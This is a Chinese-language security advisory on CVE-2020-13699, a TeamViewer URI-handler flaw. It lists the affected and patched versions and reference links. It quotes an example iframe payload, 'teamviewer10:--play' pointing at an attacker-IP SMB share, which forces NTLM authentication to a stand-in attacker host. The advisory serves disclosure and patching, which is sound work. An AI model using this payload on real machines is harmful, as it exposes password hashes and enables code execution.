CVE-2020-13699 | TeamViewer安全漏洞通告
發布時間 2020-08-090x00 漏洞概述
CVE ID |
CVE-2020-13699 |
時 間 |
2020-08-09 |
類 型 |
|
等 級 |
高危 |
遠程利用 |
是 |
影響范圍 |
TeamViewer 8,9, 10,11,12,13,14,15版本 |
0x01 漏洞詳情
近日,TeamViewer發布安全公告,修復了一個漏洞(CVE-2020-13699)。該漏洞源于程序無法正確引用其自定義URI處理程序,導致攻擊者可起動TeamViewer并執行任意代碼或獲得密碼哈希。
要利用該漏洞,用戶需要瀏覽到一個惡意頁面,該惡意頁面會在其Web瀏覽器中加載iframe。攻擊者會將iframe的src 屬性設置為
'teamviewer10:--play \\ attacker-IP \ share \ fake.tvs'
此命令表示本地安裝的TeamViewer應用程序通過服務器消息塊(SMB)協議連接到攻擊者的服務器。 攻擊者使用精心制作的URL將惡意iframe嵌入網站中,該URL 會啟動TeamViewer Windows桌面客戶端并迫使其打開遠程SMB共享。
由于是受害者的計算機發起與攻擊者的SMB共享連接,因此攻擊者不需要知道用戶的密碼,可自動通過身份驗證并獲得訪問權限。
研究人員表示:“Windows在打開SMB共享時將執行NTLM身份驗證,并且可以轉發該請求以執行代碼?!边@會影響URI處理程序teamviewer10、teamviewer8、teamviewerapi、tvchat1、tvcontrol1、tvfiletransfer1、tvjoinv8、tvpresent1、tvsendfile1、tvsqcustomer1、tvsqsupport1、tvvideocall1和tvvpn1。
0x02 處置建議
目前廠商已發布補丁,Windows的TeamViewer用戶應考慮升級到新的程序版本,其中包括:8.0.258861、9.0.28860、10.0.258873、11.0.258870、12.0.258869、13.2.36220、14.2.56676、14.7.48350、15.8.3。下載鏈接:
https://www.teamviewer.cn/cn/download/windows/
0x03 相關新聞
https://www.bleepingcomputer.com/news/security/teamviewer-fixes-bug-that-lets-attackers-access-your-pc/
0x04 參考鏈接
https://community.teamviewer.com/t5/Announcements/Statement-on-CVE-2020-13699/td-p/98448
0x05 時間線
2020-08-09 VSRC發布漏洞通告